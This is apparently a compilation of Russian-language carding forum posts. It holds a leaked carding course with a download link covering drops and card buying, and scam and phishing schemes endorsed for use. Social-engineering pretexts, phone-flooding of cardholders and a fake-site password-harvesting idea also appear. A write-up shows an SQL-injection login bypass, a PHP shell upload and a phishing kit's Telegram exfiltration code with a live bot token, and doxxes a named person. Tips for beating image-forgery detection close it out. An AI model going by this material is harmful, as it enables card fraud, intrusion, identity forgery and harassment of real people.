Полный набор для отрисовщика, софт, шаблоны, образцы паспортов, водительских прав, ssn, card, удостоверения студентов, гос номера usa, шрифты и прочее...
Облако не моё перезаливать не буду!
ДАННЫЙ МАТЕРИАЛ НЕ ПРОВЕРЯЛ НА VT. КАЧАЕТЕ И УСТАНАВЛИВАЕТЕ НА СВОЙ СТРАХ И РИСК.
Обучение в группе телеграмм "Темная личность", вот краткое содержание:
Spoiler: Содержание от автора
1. Анонимность
Создание безопасной рабочей среды
А точнее шифрование всего пк, подскажу какой VPN купить, как биток кошель
регнуть, на каком сервере зарегать jabber, как ее зарегать, настроить jabber,
нужен ли отдельный ноут и т.д
2. Говорим про виды материалов
Про кредитные карты, где купить их, какие они бывают, из чего состоят,
подробный разбор.
3. Дедик/впн/виртуалка
В начале я расскажу, про каждое, что это за такое.
Про их цену, где купить можно, как проверить качество.
После чего расскажу, как что лучше настроить, как подключаться.
А потом расскажу, когда лучше что использовать, как экономить можно будет.
+ мелкие свои фишки из опыта.
4. Говорим про дропов/скупов/посредов
Расскажу кто такие дропы, скупы, посреды.
Где найти норм дропов, говорим сколько должны стоить, где найти скупов.
Скину список дропов и скупов проверенных мной лично.
5. Виды направлений в карже
Рассказываю про пикап, рероут, перехват,вбив на дропов и т.д.
Как это делать, как нюансы. Что лучше и где проще денег поднять.
6. Полезные контакты
Скидываю полезные контакты, которые наработаны годами.
Ссылка для скачивания:
[CLIKE]
](https://mega.nz/#!5bgG1YLQ!mCEkapvtji5hmrf0IRwSqpQNVCAuOj3_3wAVkGgXXbg)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
[/CLIKE]
P.S. По моему мнению в карже делают хорошие деньги только профессионалы которые уже не один год работают и сервисы, которые продают необходимый для работы материал. Для новичка это не самое лучшее направление заработка, но для ознакомления с этой сферой деятельности слитого мной обучение вполне достаточно, а дальше решайте сами, если цепляет то развивайтесь в этом направлении, если нет, то ищите что-то другое.
Modlishka VS Evilginx
You must have at least 15 message(s) to view the content.
Хотел бы поделиться забавной высокотехнологичной «разводкой», ориентированной
на людей, которые более-менее дружат с технологиями. Ключевая уязвимость, по
которой бьют мошенники — это жадность, как обычно.
История началась со странных звонков с номера +21624218517, которые
сбрасывались через один-два гудка. Что делает современный человек, когда ему
звонят с незнакомого номера? Правильно, гуглит его. Результатов, на удивление,
немного, но один из них заслуживает особого внимания:
Удивительная ошибка, ещё более удивительная надпись с балансом аккаунта и, о чудо, кнопка show возле пароля работает.
Сайт, на который отправляет страница «ошибки», именуется Miner Coin Exchange, как бы намекая, что здесь майнят коины, и на что-то их меняют. Тема биткоинов сегодня на слуху, и желающих поднять немного «цифрового золота», скорее всего, будет предостаточно. А тут ещё и кнопочка Transfer работает:
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fi-%2Fsh%2Fmu%2Fi- shmu0zjyora5lqtbn3plnrdx8.png&hash=b1de6f15b72aae3e4efdc28129b96218)
Но при попытке перевода жертва видит досадное ограничение, для перевода нужно, чтобы на счету было 2.5 биткоина:
Что же делать? Нужно всего лишь пополнить «кошелёк» на «бирже» всего лишь на 0.01 биткоина, чтобы получить целых 26 тысяч долларов. Мало кто устоит!
Берите на вооружение, далеко не новая, но рабочая идея
(c) habr.com
![](/proxy.php?image=https%3A%2F%2Fdefcon.ru%2Fwp- content%2Fuploads%2F2019%2F04%2Fimage.jpeg&hash=6b0698ca3ee73f3feb142bd441ee7a75)
Некоторое время назад на корпоративную почту пришло письмо. Оно содержало
информацию о том, что закончился срок регистрации домена и необходимо
произвести оплату.
![](/proxy.php?image=https%3A%2F%2Fdefcon.ru%2Fwp-
content%2Fuploads%2F2019%2F04%2Ffish2.png&hash=1306a296f860bf9624e1cf38d3f63b2b)
Изучив содержимое, мы пришли к выводу, что письмо фишинговое. Об этом говорят
многие неточности содержания и оформления письма, но обо всем по порядку. Для
сравнения покажу скриншот реального письма, которое присылает REG.RU при
окончании срока действия домена.
![](/proxy.php?image=https%3A%2F%2Fdefcon.ru%2Fwp-
content%2Fuploads%2F2019%2F04%2Ffish9.png&hash=9e550e58f0360006b2400d14ee1e1858)
Теперь давайте более подробно рассмотрим фишинговое письмо.
![](/proxy.php?image=https%3A%2F%2Fdefcon.ru%2Fwp-
content%2Fuploads%2F2019%2F04%2Ffish10-2.png&hash=79a6ea30dcf8d18d810eeffb1c5f7c0b)
1. Тема письма.
Как правило, в теме письма указывается название домена и окончание срока его
регистрации.
2. Отправитель.
Официальные письма обычно направляются с домена компании, которая отправляет
письмо.
3. Оформление.
Письмо оформлено минималистично, нет никакой дополнительной информации (ссылка
на сайт, личный кабинет, правовая информация и т.д.), можно сравнить с
оригинальным письмом. Текст письма составлен таким образом, чтобы оказать
психологическое воздействие на получателя. Например, в тексте говорится, что
оплатить домен необходимо в течение одного рабочего дня с момента получения, а
также описываются возможные последствия, если оплаты не произойдет.
4. Оплата.
При наведении курсора на кнопку оплаты можно увидеть ссылку на страницу всеми
известного сервиса электронных переводов. Как правило, оплата услуг компании
производится через личный кабинет на официальном сайте.
![](/proxy.php?image=https%3A%2F%2Fdefcon.ru%2Fwp-
content%2Fuploads%2F2019%2F04%2Ffish11.png&hash=a0263c18ada776f76619b25b92384dfb)
Подводя итог, хотелось бы сказать, что подобные методы мошенничества до сих
пор остаются одними из самых популярных и продуктивных.
Автор @Hekpo
Мы нашли новые компании, которые носят имя MuddyWater. Анализ выявил использование новых инструментов и полезных нагрузок, что свидетельствует о том, что они постоянно разрабатывают новые схемы. Мы также обнаружили и подробно изложили другие наши выводы о MuddyWater, такие как его подключение к четырем вариантам вредоносного ПО на Android и использование методов ложного флага(false flag techniques), в нашем отчете “New MuddyWater Activities Uncovered: Threat Actors Used Multi-Stage Backdoors, False Flags, Android Malware, and More.”
Одна из кампаний направила фишинговые электронные письма в университет в Иордании и правительство Турции. Компания использовала скомпрометированные законные учетные записи, чтобы обманным путем заставить жертву установить вредоносное ПО.
Рисунок 1. Это фишинговое электронное письмо как-будто от государственного
учреждения, датированное 8 апреля 2019 года.
Рисунок 2. Заголовки письма, показывающие происхождение фишинг-письма
Наш анализ показал, что группа субъектов угроз использует новый многоступенчатый бэкдор на основе PowerShell под названием POWERSTATS v3 (обнаруженный Trend Micro как Trojan.PS1.POWERSTATS.C). В электронном письме, содержащем документ со встроенным вредоносным скриптом, удаляется файл VBE, закодированный с помощью Microsoft Script Encoder. Затем выполняется файл VBE, содержащий блок данных в кодировке base64, содержащий запутанный сценарий PowerShell. Этот блок данных будет декодирован и сохранен в каталоге% PUBLIC% под различными именами, заканчивающимися расширениями файлов изображений, как .jpeg и .png. Код PowerShell будет затем использовать пользовательскую обфускацию строк и бесполезные блоки кода, чтобы затруднить анализ.
Рисунок 3. Фрагмент кода запутанного и бесполезного кода
Окончательный бэкдор-код раскрывается после деобфускации всех строк и удаления
всего ненужного кода. Но сначала бэкдор получит информацию об операционной
системе (ОС) и сохранит результат в файле журнала.
Рисунок 4. Фрагмент кода сбора информации об ОС
Этот файл будет загружен на командно-контрольный (C & C) сервер. Каждая
машина-жертва генерирует случайный номер GUID, который будет использоваться
для идентификации машины. Позднее вредоносное ПО запускает бесконечный цикл,
запрашивая файл с GUID-именем в определенной папке на сервере C & C. Если
такой файл найден, он будет загружен и выполнен с использованием процесса
Powershell.exe.
Атака может быть запущена командами, отправленными конкретной жертве
асинхронным способом, например, полезная нагрузка бэкдора может быть загружена
и установлена для целей, которые им интересны.
Рисунок 5. Код в POWERSTATS v3, который загружает второй этап атаки
Нам удалось проанализировать случай, когда группа начала атаку второй стадии. Группе удалось загрузить еще один бэкдор, который поддерживается следующими командами:
Рисунок 6. Код в POWERSTATS v3 (второй этап), который обрабатывает команду
снимка экрана
Связь C & C осуществляется с использованием PHP-скриптов с хорошо закодированным токеном и набором внутренних функций, таких как sc (снимок экрана), res (результат выполненной команды), reg (регистрация новой жертвы) и uDel (самоудаление после ошибки) ,
Рисунок 7. В бесконечном цикле вариант вредоносного ПО запрашивает заданный
путь на сервере C & C, пытаясь загрузить файл с GUID-именем с командами для
выполнения.
Другие компании MuddyWater в первой половине 2019 года
Группа создателей MuddyWater активно нацелилась на жертв с творческим
подходом, и они, похоже, продолжают добавлять все больше по мере продвижения
новых кампаний. Кампания, которая использовала POWERSTATS v3, не единственная,
которую мы нашли с новыми способами распространения. Мы наблюдали и за другими
компаниями, которые меняли методы распространения MuddyWater, отбрасывая типы
файлов. Примечательно, что эти кампании также изменили полезную нагрузку и
общедоступные инструменты после проникновения.
Discovery Date | Method for dropping malicious code| Type of files dropped| Final payload
---|---|---|---
2019-01| Macros| EXE| SHARPSTATS
2019-01| Macros| INF, EXE| DELPHSTATS
2019-03| Macros| Base64 encoded, BAT| POWERSTATS v2
2019-04| Template injection| Document with macros| POWERSTATS v1 or v2
2019-05| Macros| VBE| POWERSTATS v3
Таблица 1. Способы распространения и виды полезной нагрузки MuddyWater в 2019 году
В январе 2019 года мы обнаружили, что компания начала использовать SHARPSTATS (Trojan.Win32.SHARPSTATS.A), бэкдор, написанный на .NET, который поддерживает функции DOWNLOAD, UPLOAD и RUN. В том же месяце появился DELPHSTATS (Trojan.Win32.DELPSTATS.A), бэкдор, написанный на языке программирования Delphi. DELPHSTATS запрашивает у сервера C & C файл .dat перед его выполнением через процесс Powershell.exe. Как и SHARPSTATS, DELPHSTATS использует пользовательский сценарий PowerShell со сходством кода с тем, который встроен в первый.
Рисунок 8. SHARPSTATS можно использовать для сбора системной информации,
удалив и выполнив скрипт PowerShell.
Рисунок 9. Код в DELPHSTATS, который запрашивает определенный каталог на
сервере C & C. Это где операторы загружают дополнительную полезную нагрузку.
Мы столкнулись с сильно запутанным POWERSTATS v2 (Trojan.PS1.POWERSTATS.B) в марте 2019 года. Более ранняя версия этого бэкдора декодирует исходные кодированные / сжатые блоки кода. Имена функций в более ранней версии все еще были читаемыми, но в более поздних версиях они были полностью рандомизированы.
Рисунок 10. Запутанный POWERSTATS v2
После деобфускации главный бэкдор-цикл запрашивает разные URL-адреса для сообщения «Hello server», чтобы получить команду и загрузить результат команды run на сервер C & C.
Рисунок 11. Деобфусцированный основной цикл POWERSTATS v2
Использование различных инструментов после получения доступа
Мы также наблюдали как MuddyWater использовал несколько инструментов с
открытым исходным кодом после получения доступа.
Название инструмента после получения доступа| Язык программирования /
Интерпретатор
---|---
CrackMapExec| Python,
PyInstaller
ChromeCookiesView|
Executable file
chrome-passwords|
Executable file
EmpireProject| PowerShell, Python
FruityC2| PowerShell
Koadic| JavaScript
LaZagne| Python, PyInstaller
[Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-
meterpreter/)| Reflective
loader, executable
file
Mimikatz| Executable file
MZCookiesView| Executable file
PowerSploit| PowerShell
Shootback| Python, PyInstaller
Smbmap| Python, PyInstaller
Таблица 2. Инструменты, используемые кампаниями MuddyWater на протяжении многих лет.
Одна кампания выделяется тем, что она использует дампер LaZagne для проверки учетных данных, который был исправлен для удаления и запуска POWERSTATS в основной функции.
Рисунок 12. LaZagne был исправлен для удаления и запуска POWERSTATS в
основной функции. Смотрите добавленную функцию intimoddumpers (). Обратите
внимание на опечатку в имени функции - INTI, а не INIT.
Заключение и рекомендации по безопасности
Хотя MuddyWater, похоже, не имеет доступа к zero-days атакам и продвинутым
вариантам вредоносного ПО, ему все же удалось скомпрометировать свои цели. Это
можно объяснить постоянным развитием их схем получения доступа.
Примечательно, что использование группой электронной почты в качестве переносчика, похоже, дает успех. В связи с этим, помимо использования интеллектуальных решений для защиты электронной почты, организации должны информировать своих сотрудников о способах защиты от почтовых угроз.
Организации также могут воспользоваться Trend Micro ™ Deep Discovery ™, решением, которое обеспечивает обнаружение, углубленный анализ и проактивный ответ на современные скрытые вредоносные программы и целевые атаки в режиме реального времени. Он обеспечивает комплексную защиту, предназначенную для защиты организаций от целевых атак и расширенных угроз с помощью специализированных механизмов, настраиваемой изолированной программной среды и плавной корреляции на протяжении всего жизненного цикла атаки, что позволяет обнаруживать угрозы даже без каких-либо обновлений механизма или шаблона.
Источник:https://xss.is
Переводчик статьи - https://xss.is/members/177895/
Может кто-нибудь подсказать где купить/арендовать скрипт?
Или может бесплатно есть где-то?
Нужен чел,которой способен задекодить подобное гавно IHDR d K " IDATx }y eWy ݷ
~ w > h6 E ]% " L JQV*!IŕT叔v A @ @ h } ߾ }M 3 ЗЗ
За подробностями в лс
Современные системы защиты могут защитить данные практически от всего, кроме человеческого фактора. Можно воздвигнуть неприступную программную стену перед потенциальным хакером, но все труды окажутся напрасными, если наивный пользователь сам сообщит злоумышленнику пароли. « Взломать человека намного проще, чем компьютер, поскольку компьютеры следуют инструкциям, а люди – поддаются эмоциям », – утверждает Кевин Митник, один из самых знаменитых хакеров мира.
Социальная инженерия, или взлом человеческого сознания – один из самых популярных хакерских инструментов современности. Вы удивитесь, но самые коварные методы социальной инженерии практически не требуют от злоумышленника особых технических знаний. Вот несколько приемов, которые будут актуальны до тех пор, покуда существует человеческая глупость. То есть вечно.
Глупый новичок
Это – один из хрестоматийных примеров того, как хакер может завладеть паролем
для доступа в корпоративную систему. Особенно он актуален для крупных
компаний, где многие сотрудники зачастую не знакомы друг с другом. Хакеру
достаточно связаться с одним из сотрудников по телефону или электронной почте
и выдать себя за глупого новичка. Кончено, многое тут зависит от везения.
Нужно изначально не ошибиться и выбрать в качестве живой «уязвимости»
доверчивого и сердобольного человека, готового помочь неопытному «коллеге».
Аккуратно расспрашивая сотрудника и жалуясь на то, что «ничего не получается», хакер выманивает у него пароль для доступа в систему. А далее – дело техники.
Большой и злой босс
Прием, обыгранный в массе шпионских фильмов, но не потерявший актуальности. Вы
наверняка видели в каком-нибудь кино, как герой звонит, к примеру, на
контрольно-пропускной пункт, прикидывается злым генералом и требует от
робеющих дежурных немедленно что-то сообщить или кого-то пропустить.
Пример довольно утрированный, но даже в 2016 году с помощью подобной уловки хакеры умудряются грабить банки. Ярчайший пример – в январе злоумышленники похитили из крупного бельгийского банка 70 млн. евро. Хакер направил одному из менеджеров финансового отдела гневное письмо, где представился одним из важных клиентов банка. «Клиент» сердился и спрашивал, какого дьявола банк задерживает проведение невероятно важной транзакции. Сотрудник испугался и перевел деньги, не особо вдаваясь в проверки присланных документов, подделанных при помощи фотошопа.
К слову, этот метод отлично совмещается с «глупым новичком». То т же «большой и злой генерал» может позвонить подчиненным и потребовать объяснений, почему у него что-то не работает. Главное в это деле – харизма и убедительность. Гнев, глупость и самодурство должны «большого босса» выглядеть достаточно естественно и быть достаточно интенсивными, чтобы жертва не смогла собраться с мыслями и просто не успела усомниться в происходящем.
Техподдержка
Несмотря на возросшую компьютерную грамотность, при желании Вы все еще легко
отыщете людей, мечтающих о наличии на клавиатуре кнопки «сделать всё хорошо».
Это – тот самый скорбный разумом контингент, который никогда « ничего не
нажимал, всё само сломалось ». Такие люди – настоящая находка.
Потому хакеру достаточно позвонить им и сказать что-то вроде « Я из техподдержки, мне сообщили, что у вас проблемы с компьютером ». У жертвы гарантированно обнаружатся «проблемы с компьютером», будь то исчезнувшая линейка в Microsoft Word или заблокированные админом «Одноклассники». В ходе решения таких «проблем» пользователь поверит едва ли не каждому слову хакера и с радостью продиктует ему всё что угодно, включая логин, пароль и паспортные данные собственной бабушки.
Пиццу заказывали?
Если Вы работаете в крупном офисе, оглядитесь вокруг. Посмотрите на компьютеры
коллег. Наверняка на чем-нибудь мониторе вы обнаружите липкий стикер, где
записаны все необходимые пароли для входа в систему. Таким образом,
внимательному и зоркому хакеру нужно лишь найти способ попасть в офис.
Способов для этого может быть масса. К примеру, ни для кого не секрет, что
иногда по офисным зданиям ходят «бродячие продавцы», предлагая местным
обитателям разнообразную косметику, книги или прочий товар. Нет никаких
гарантий, что один из таких продавцов, войдя в помещение, не начнет
высматривать на чьем-нибудь мониторе бумажку с паролями.
Следует отметить, что в случае с большими корпорациями этот метод не сработает, так как они на свою территорию посторонних, как правило, не пропускают. Но если Ваша компания снимает офис в местом Доме Быта, то нет никаких гарантий, что паренек-курьер, который полчаса назад ошибся дверью, этим же вечером не попытается взломать Вашу базу данных.
Всем привет выдалось минутка решил на писать глупость может кому пригодиться кто не любит регать номератут упоминал про своё бурное дество и вечно занятые телефоны вот говно список pastebin.com который таскают по всем мега- кардер бордам с 2008
Вообщем поискав нашел три варика решения данной проблемы начнем спростого переходи в этоттоп выбераем список обзванием как правило на виртуальные номера для приема смс можно звонить и не кто не будет брать трубу кстати угон виртуального номера
Второй шаг и более трудный
Хороший совет но искать Вы точно заебётесь по этому переходим сюда и скачиваемGoogle Maps Email Extractor кряк у меня не заработал но там рега минуту и дают триал на неделю,дальше берем zip тут fakenamegenerator.com
Вставляем как на скриншоте zip и город можете там побаловаться разрешаю
На седьмом сайтеnyas.org меня ждал профит
Вообщем пока писал всё это выше нашел ещё более простое решения и так метод три переходи в этот топ и смотрим тамтему,берем этот список pastebin.com и вставляем при реги на переадресацию эти занятые номера можно и флудам заебать кардхолдера или поставить автодозвон Auto Dialer
** p.s По части ru номеров регаем себе номер на пять дней**
youmagic.com как заметил ещё месяц на него
звонишь не кто не берет трубу ну вроде всё
© copyright
Всем привет сегодня будет заметка как собрать на любом борде логин и пароли,почты,переходим тыц.
Фишинг тут как вы поняли не нужен бегом к верстали что-бы смахнул такой- же,пороли и логи все к Вам летят по больше рекламы :fuck: да и не забудьте ему сказать что-бы в базу добавил для валида самых распространенных паролей что-бы Ваша идея не умерла на месте,вот ещё хороший пример тыц.
Где брать терпил ну как пример переходим bhf[.]io кли- кай да кстати если Вы внимательно по читаете там посты то поймете что там и брутить не надо сами пишут что их пароль пиздец как мощный Идея не моя а рассказана мне моим старым другом кодером,который так угнал пароль у своей девчонки.
В продолжения темы смотрим тыц не стал заморачиваться но идея сама хорошая можно и фейк это вставить и в любой сервис и пиздить,что есть в автозаполнение форм в браузере а также сс,номера и адреса и.т.д сам инструмент тыц
Аннотация
Каждый из нас может стать жертвой злоумышленника, но иногда хищник и добыча меняются местами.
Это краткая история о том, как неумелое использовании технологий может привести к раскрытию личности. Статья будет полезна как юным хакерам, желающим получить «легкие деньги», так и тем, кто хочет их поймать.
Введение
Одним февральским вечерком я был занят поиском места для романтичного свидания со своей возлюбленной. Через какое-то время мое внимание привлек сайт milleniumfilm.ru, не доступный в настоящее время. Сайт предоставлял услуги аренды небольших кинозалов для частного просмотра. Красивые картинки, умеренные цены, есть онлайн поддержка, одно но: данные банковской карты предлагалось ввести на не защищенной странице этого же домена. Насторожившись, я написал в техподдержку сайта, и мошенники не заставили себя долго ждать — поняв, что я достаточно технически грамотен послали меня на 3 буквы. Конечно, мошенникам нет смысла тратить на меня время, но зачем так грубо? — В любой ситуации нужно оставаться Человеком.
С отзывами о сайтах такого же плана можно ознакомиться тут: [zhaloba- online.ru](https://zhaloba-online.ru/zhaloba/na-sajty/cinemafall-ru- moshenniki.html). Некоторые из них даже до сих пор работают.
Взлом
Чувствуя вселенскую несправедливость, с целью установления личности злоумышленника и пресечения его деятельности, я принялся изучать сайт на предмет уязвимостей.~~Ткнув пальцем в небо~~ Первый введеный адрес привел меня в панель администратора, который вежливо просил указать «Логин» и «Пароль».
~~Первая же попытка SQL-инъекции~~ Первый пришедший в голову пароль
Code:Copy to clipboard
1' or '1
дал мне доступ к настройкам сайта.
Данный скриншот был сделан после атаки, потому имя пользователя такое
говорящее.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fcn%2Frl%2Ftz%2Fcnrltzrv9uysxvox8yem-
ieezps.png&hash=f119a30ce63b69b89ff59f7ddf7c428e)
Сайт создателя данного творения Gelloiss.ru красовался на первой же странице. Особенно интересным оказался раздел «Банковские карты» — там отображались все введенные данные: фамилия и имя держателя карты, номер карты, срок действия, cvc2 и код подтверждения из смс.
Как это работает.
Получив реквизиты банковской карты, злоумышленник делает запрос на перевод
средств с карты и перенаправляется платежной системой на страницу 3D-secure,
где нужно ввести код из смс. Код приходит в смс на телефон жертвы, который
вводит его в форме сайта. Получив код из смс, мошенник вводит его на странице
3D-secure подтверждая транзакцию. Вся эта схема требует неотлагательный
действий самого мошенника, что наводит на мысль, что сайт должен быстро
уведомлять о наличии жертвы.
На странице «Настройка фильмов» была достаточно простая форма для формирования тексто-графических блоков. Функция загрузки картинки не фильтровала контент загружаемых файлов, что навело на мысль о возможности залить php-shell. Шелл успешно залился в /images/ , откуда я его скопировал в корень сайта под названием login.php. Получив доступ к консоли, я принялся изучать внутренности сайта.
Список файлов.
Среди содержимого меня привлек файл telegram.php.
Код.
Code:Copy to clipboard
$ cat telegram.php
Code:Copy to clipboard
<?
function send_mess($text) {
$token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
$mess = $text;
$chat = "-302359340";
/*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}
PHP скрипт содержал в себе токен телеграм-бота и отправлял сообщения в чат при вызове функции send_mess. Поискав по коду сайта стало ясно, что именно с помощью телеграм-бота злоумышленнику отправляются данные карт, смс код.
grep
Code:Copy to clipboard
./cart.php:22:send_mess("Имя клиента: ".$name."%0D%0AEmail: ".$email."%0D%0AТелефон: ".$phone."%0D%0AДата посещения: ".$date."%0D%0A"."Время: ".$time."%0D%0AГород: ".$city."%0D%0AСумма: ".$sum."%0D%0AСписок заказанных услуг: ".$services."%0D%0AIP: ".$ip."%0D%0AЗабанить: ".$link_ban_ip);
./pay/ms.php:21: send_mess("Сумма: ".$sum."%0D%0AИмя владельца карты: ".$name."%0D%0AНомер карты: ".$num."%0D%0AСрок годности, месяц: ".$month."%0D%0AГод: ".$year."%0D%0Acvv: ".$cvv);
Что ж, у нас есть токен телеграм-бота, chat_id, адрес создателя сайта на котором красуется skype «ura7887» и telegram «Gelloiss» (раньше telegram не был указан, потому для того чтобы убедиться что telegram-аккаунт принадлежит владельцу сайта я использовал наживку).
Скриншот с сайта gelloiss.ru
Выясним, кто создал чат, в который бот отсылает сообщения.
curl
Code:Copy to clipboard
$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}
Как видно создатель чата имеет такой же username как и сайт создателя — «gelloiss».
Поиск
Помните: интернет ничего не забывает! Поиск по ключевым словам: «gelloiss», «ura7887», привел меня на страницу вконтакте Юрия Искры, где указан как сайт «Gelloiss.ru», так и skype «ura7887».
Скриншот.
А вот тут: vk.com видно, что данным скайп логином Юрий пользовался еще 6 лет назад, когда ему было 14 лет.
Скриншот.
А так же тут [anime.anidub.com](https://anime.anidub.com/anime/full/9388-derevnya-tv-2-non- non-biyori-repeat-tv-2-01-iz-12.html).
Скриншот.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fa9%2F_w%2Fqo%2Fa9_wqoj1wquztwecuyrtsgiu-
ng.png&hash=cdd65071671be7b4918d1fdea7b98954)
Проверка telegram
На момент начала истории, на сайте Gelloiss.ru не был указан логин telegram, потому мне нужно было связать владельца telegram- аккаунта с владельцем сайта или страницей вконтакте. Для этого я создал некий маркер, который владелец telegram-аккаунта должен будет разместить у себя.
shell
Code:Copy to clipboard
$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 -
Далее я написал в telegram и представившить потенциальным заказчиком предложил пройти проверку: попросил разместить маркер a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8на странице вконтакте.
Скриншот диалога telegram
Заключение
Лично у меня не осталось сомнений, что страница вконтакте принадлежит злоумышленнику. На момент взлома сайта, в базе данных было не менее 100 различных номеров карт, а к моменту закрытия сайта еще +100.
В заключение давайте посмотрим, где учится наш «герой». Это легко определить посмотрев где учатся его «друзья по вузу».
Большой скриншот
Продолжение следует
Мне удалось получить доступ к сообщениям, которые отсылает бот. Масштабы бедствия поражают: за 3 месяца телеграм-бот отослал примерно 13 тысяч сообщений. Даже если предположить, что всего-лишь пятая часть полученных данных валидна, то список пострадавших превысит 2 тысячи человек. Хакер работает не один, а с сообщниками, которые завлекают клиентов и помогают с переводом средств. На данный момент злоумышленники получают паспортные данные, телефоны и номера карт с сайта moneyonline.world.
Фрагмент дампа сообщений telegram:
Code:Copy to clipboard
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message='[B]Короче нужен сайт по «переводу карты на карту без комиссии» естесственно он должен высылать данные карты и код подтверждения мне[/B]', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='[B]moneyonline.world/pay/?pay=123\nТипа этого?)) \nДанные в телегу приходят[/B]', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ это платежная система для тех, кто зарабатывает в интернете. Электронный кошелек, прием платежей и вывод денег, денежные переводы. Мгновенная регистрация, выгодные комиссии.', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | Электронный кошелек, платежи, прием и вывод денежных средств', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Автор: misery-hacker
взято с habr.com
Определяем, было ли вмешательство в изображение при помощи простейших утилит и простеньких шагов. Для серьезного антифрода не покатит, но на элементарном уровне можно уже все проверить.
2 классных статьи и инструмент:
Итак, начнем сразу с примера изображения. Исходник фотографии.
Сначало воспользуемся инструментом ELA и сразу видим, что суммы подверглись
изменению.
Подтвердим на более подробном разборе с помощю инструментов Luminance Gradient и Principal Component Analysis. Видно разницу в шуме около сумм, он имеет разное происхождение
Но не всегда будет так просто, попробуем усложнить задачу.
Сделаем простой монтаж с заменой лица на рандомном паспорте.
И проверим с ELA
Наблюдаем увеличения шума на лице, такого быть не должно. Делаем вывод: Скорее всего лицо подверглось изменению.
Самое сложное, в этом способе, понять, что же мы должны искать на фото и разобраться как работают инструменты.
После этого мы сможем успешно обходить эти инструмены и делать свой монтаж.
Пример на фото заменяем 40 рублей на 100 на двух транзакциях. Просто копируем слой с соточкамии накладываем поверх сорока рублей.
Видно, что ничерта не видно. Изменений шума и прочих косяков нет. Более
серьезно никто копать не будет. Вывод: Фото скорее всего чистое.
Не забываем, любой инструмент эффективен только в руках мастера
Миллионы людей играют в онлайн-игры, кто-то продаёт добытую валюту, кто-то покупает её за реальные деньги, та же история с аккаунтами, есть множество сервисов (бирж) по продаже и покупке игровых ценностей. В России и странах СНГ самый популярный сайт - FunPay — биржа игровых ценностей (не реклама), там мы и будем покупать товары, а продавать мы будем на зарубежных сайтах, т.к. у них выше уровень жизни и большинство цен выше, чем на российских биржах.
Работал я сам по системе дропшиппинга, то есть товара у меня в наличии не было, я просто переводил сообщения моего покупателя с английского языка на русский и отправлял своим поставщикам, в сообщениях велась переписка о том, куда удобнее доставить валюту покупателю, где встречаемся и другая информация о транзакции. Таким образом у меня покупали товар, а я оплачивал его на российской бирже и поручал своим дилерам отдать товар определённому игроку в обговоренном месте в самой игре.
Главное следить за тем, есть ли товар по нужной цене на сайте FunPay — биржа игровых ценностей, а на сайте G2G Games Marketplace | Gaming Virtual Goods Marketplace & Trading Platform нужно следить за своей позицией в топе наилучшей цены, в идеале ваша цена должна быть самой низкой при этом выгодной для вас. Иногда, цены на российской бирже и на зарубежной бирже примерно одинаковы, тогда следует сменить игру, либо товар в этой игре, все это нужно смотреть вручную на 2-ух сайтах и искать разницу в ценах примерно в 20% (это минимум, т.к. при продаже есть комиссия в 10%), на некоторые популярные товары маржа доходит до 50% разницы между биржами.
Переходим к реализации
Шаг первый
Регистрируемся тут - G2G Games Marketplace | Gaming Virtual Goods Marketplace & Trading Platform , чтобы вам открыли кабинет продавца пишите в саппорт, они вам высылают инструкцию прохождения регистрации. Сразу скажу, нужны будут ваши паспортные данные: фото паспорта, скан или фото документа по которому вы недавно оплачивали жкх или другой документ, где будет видно ваши ФИО и место проживания, а также потребуется фото с вашей физиономией, держащей УД или паспорт рядом.
Шаг второй
Заходим на - FunPay — биржа игровых ценностей , выбираем
игру по которой хотите двигаться. По опыту скажу, выбирайте игры, которые
выделены жирным текстом, они наиболее популярны среди игроков. Далее выбираем
валюту, аккаунты, предметы, либо услуги. Я продавал услуги и валюту, а
предметы и аккаунты не пробовал.
Шаг третий
Возьмем услугу по прокачке в игре path of exile. На Российский бирже прокачка
с 1 по 70 уровень стоит 8 долларов в среднем, можно найти и дешевле. На
Зарубежной бирже эта услуга стоит 10 долларов (минус 10% за продажу на бирже и
1% за вывод с сайта на вебмани), итого получим примерно 8.88$, то бишь 10%
чистой прибыли из воздуха. Перед выставлением предмета проанализируйте
минимальную цену на этот предмет на g2g, сравните цены с Российский биржей,
для этого я использую конвертер валют от гугла.
